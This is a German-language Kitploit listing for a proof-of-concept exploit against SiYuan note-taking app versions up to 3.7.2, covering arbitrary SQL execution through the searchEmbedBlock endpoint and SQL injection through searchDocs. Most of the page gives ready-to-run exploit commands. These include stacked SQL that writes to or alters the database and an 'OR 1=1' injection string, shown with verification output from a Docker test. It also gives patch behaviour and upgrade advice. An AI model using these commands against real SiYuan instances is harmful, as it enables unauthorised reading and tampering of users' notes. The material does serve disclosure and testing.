Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-69084-PoC — CVE-2026-69084/69085 — SiYuan beliebige SQL-Ausführung über searchEmbedBlock + searchDocs SQLi (CVSS 9.9). Verifiziert auf v3.7.2, zurückgewiesen auf v3.7.3. | Kitploit
Tools/GitHubGitHub/boreas37/cve-2026-69084-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsDatenbanksicherheit
GitHubboreas37/cve-2026-69084-poc

CVE-2026-69084-PoC

CVE-2026-69084/69085 — SiYuan beliebige SQL-Ausführung über searchEmbedBlock + searchDocs SQLi (CVSS 9.9). Verifiziert auf v3.7.2, zurückgewiesen auf v3.7.3.

Repository anzeigen
11vor 19 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-69084 / CVE-2026-69085 — SiYuan Beliebige SQL-Ausführung & SQLi

CVE-2026-69084: Beliebige SQL-Ausführung über /api/search/searchEmbedBlock CVE-2026-69085: SQL-Injection über /api/filetree/searchDocs CVSS 9.9 (Kritisch) jeweils · CWE-89 · SiYuan <= v3.7.2 (behoben in v3.7.3) Veröffentlicht 2026-08-03 · kein öffentlicher PoC zum Zeitpunkt der Veröffentlichung

TL;DR

SiYuan (Open-Source-Notiz-App, github.com/siyuan-note/siyuan) legt zwei API-Endpunkte offen, die angreiferkontrolliertes SQL an seine SQLite-Datenbank übergeben:

CVE-2026-69084 — /api/search/searchEmbedBlock: Der Parameter stmt wird unverändert an den primären Lese-Schreib- siyuan.db-Handle übergeben, ohne Einschränkung auf einzelne Anweisungen oder Nur-Lesen. Der SQLite-Treiber führt gestapelte (durch Semikolon getrennte) Anweisungen aus, sodass ein Angreifer / / / / für alles in der Datenbank ausführen kann. Nur durch geschützt — erreichbar mit einem RoleReader-Token für die Veröffentlichung oder anonym, wenn der Veröffentlichungsmodus gesetzt hat.

CREATE
INSERT
UPDATE
DELETE
DROP
CheckAuth
Publish.Auth.Enable=false

CVE-2026-69085 — /api/filetree/searchDocs: Der Parameter keyword wird direkt in SQL eingefügt, ohne Escape oder Parameterbindung.

Beide wurden in v3.7.3 über sql.CheckSingleStatement() + sql.CheckReadonlyStatementInBox() behoben.

Exploit

root@kitploit:~
# 1. Nicht-destruktive Prüfung (sqlite_version)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --check

# 2. DB-Schreib-Nachweis: CREATE TABLE + INSERT
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --proof

# 3. Beliebige SQL-Ausführung (gestapelte Anweisungen unterstützt)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> "SELECT * FROM blocks LIMIT 5"
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> "UPDATE blocks SET hpath='PWNED' WHERE id=(SELECT id FROM blocks LIMIT 1)"

# 4. searchDocs SQLi (69085)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --searchdocs "x' OR 1=1 --"

Wenn die Instanz mit aktiviertem Veröffentlichungsmodus und deaktivierter Authentifizierung läuft (Publish.Auth.Enable=false), wird überhaupt kein --auth benötigt.

Verifizierung (echtes SiYuan v3.7.2 in Docker)

root@kitploit:~
$ python3 CVE-2026-69084.py http://127.0.0.1:6806 --auth test123 --proof
[*] SQL: CREATE TABLE IF NOT EXISTS pwn_69084 (id INTEGER)
[+] SQL akzeptiert (blocks: 0)
[*] SQL: INSERT INTO pwn_69084 VALUES (31337)
[+] SQL akzeptiert (blocks: 0)
[+] DB-SCHREIB-NACHWEIS ABGESCHLOSSEN — pwn_69084-Tabelle + 31337-Zeile in siyuan.db

# Auf dem Host:
$ sqlite3 siyuan.db "SELECT * FROM pwn_69084;"
31337

Gepatchtes v3.7.3 lehnt dieselben Anfragen ab:

  • SELECT 1; CREATE TABLE x → "SQL statement is not single"
  • UPDATE blocks ... → "SQL statement is not a read-only query"
  • einzelnes SELECT funktioniert weiterhin (legitime Funktionalität bleibt erhalten)

PoC-Interna

Der Python-PoC führt einen Sitzungs-Login (/api/system/loginAuth) durch, um das Auth-Cookie zu erhalten, und sendet dann POST-Anfragen an den verwundbaren Endpunkt. Getestet gegen b3log/siyuan:v3.7.2 (verwundbar) und b3log/siyuan:v3.7.3 (gepatcht).

Abhilfe

  • Aktualisieren Sie SiYuan auf v3.7.3 oder neuer.
  • Wenn Sie den Veröffentlichungsmodus von SiYuan freigeben, halten Sie Publish.Auth.Enable=true und verwenden Sie starke RoleReader-Tokens.

Referenzen

  • GHSA-p2x7-4c4p-8wh6 (69084)
  • GHSA-5w4j-hchp-r332 (69085)
  • NVD — CVE-2026-69084
  • NVD — CVE-2026-69085
  • VulnCheck-Advisory

Haftungsausschluss

Nur für autorisierte Sicherheitstests und Bildungszwecke.

Tool herunterladen